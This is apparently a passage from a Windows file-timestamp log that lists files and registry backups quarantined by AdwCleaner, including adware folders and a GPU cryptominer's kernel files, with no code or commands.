         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fbef9ceaf336383d_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\fddd11ea475c5135_0
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\index-dir\the-real-index
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\file__0.localstorage-journal
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage
         -1.2s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Local Storage\http_www.imdb.com_0.localstorage-journal
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\backup6.bin
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\German_pcp.dat
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-12-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\log_02-13-2017.log
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\
         -1.0s C:\AdwCleaner\quarantine\files\ufcrmjfpytssofudwydmepawwumekcnb\voice\de\voice.wav
         -1.0s C:\ProgramData\NVIDIA\MessageBus_5528_0x667E90.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\em.exe
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\eng_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\French_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\German_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound0.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\ininotfound2.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\isxdl.dll
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\japan_em.ini
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-12-2017.log
         -0.9s C:\AdwCleaner\quarantine\files\bvchxdwshbwgukxjtndfphyxlvstjgkr\log_02-13-2017.log
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra-uninst.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\decredGeForce GTX 750 Tigw256l4tc4032.bin
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.conf
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\gplyra.exe
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\msvcr120.dll
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\start.cmd
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\aes_helper.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\blake256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\bmw256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\cubehash.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\darkcoin-mod.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\decred.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\echo.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\fugue.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\groestl256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\jh.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\keccak1600.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\luffa.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2re.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2rev2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\lyra2v2.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\neoscrypt.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shabal.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\shavite.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\simd.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\skein256.cl
         -0.7s C:\AdwCleaner\quarantine\files\niatpqgnnaomrebtwfanlprjnurtpbhb\gplyra\kernel\vanilla.cl
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\
         -0.6s C:\AdwCleaner\quarantine\files\ooayadcdwhbjxeftcugzavjygjooooyj\WinSAP.dll
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\
         -0.5s C:\AdwCleaner\quarantine\files\qshahttdnawtfesajygismqkeplwuzov\WinSnare.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\sma.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci32.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smci64.dll
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi32.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smi64.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\SMUninstall.exe
         -0.4s C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smw.sys
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\
         -0.3s C:\AdwCleaner\quarantine\files\dnvamrbyynolbnrjffyndvafsiefsaxe\smhe.js
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\Config.json
         -0.3s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\set.exe.config
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.Linq.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\System.Data.SQLite.xml
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X64\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\
         -0.2s C:\AdwCleaner\quarantine\files\xhszhayleqmgttjapzldenwegvoihxsi\X86\SQLite.Interop.dll
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.HP
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\ff.NT
         -0.2s C:\AdwCleaner\quarantine\files\fbbjasygkorzdwzozqncjlevzgqwxrph\snp.sc
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Config.xml
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe
         -0.1s C:\AdwCleaner\quarantine\files\awmafxjwktdmzodqxohucbnfvwxfmcbx\Nettrans.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Cofstock.exe.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\conf.config
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Config.xml
         -0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\DanDubdom.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Dong-Home.dll
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Fincore.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Freshing.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Groovestrong.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.d.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.0s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.1s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.2s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.2s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.3s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.3s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.4s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.5s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.6s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          0.6s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          0.6s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          0.6s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          0.7s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          0.7s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          0.7s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          0.8s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          0.8s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          0.8s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          0.8s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          0.9s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          0.9s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          0.9s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          0.9s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.0s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.0s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.0s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.0s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.1s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.1s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.1s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.1s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.1s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.2s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.4s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.5s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          1.6s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          1.7s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          1.8s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.5s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          2.6s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          2.7s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.2s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.0s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.1s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.2s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.2s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.3s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.4s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.5s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
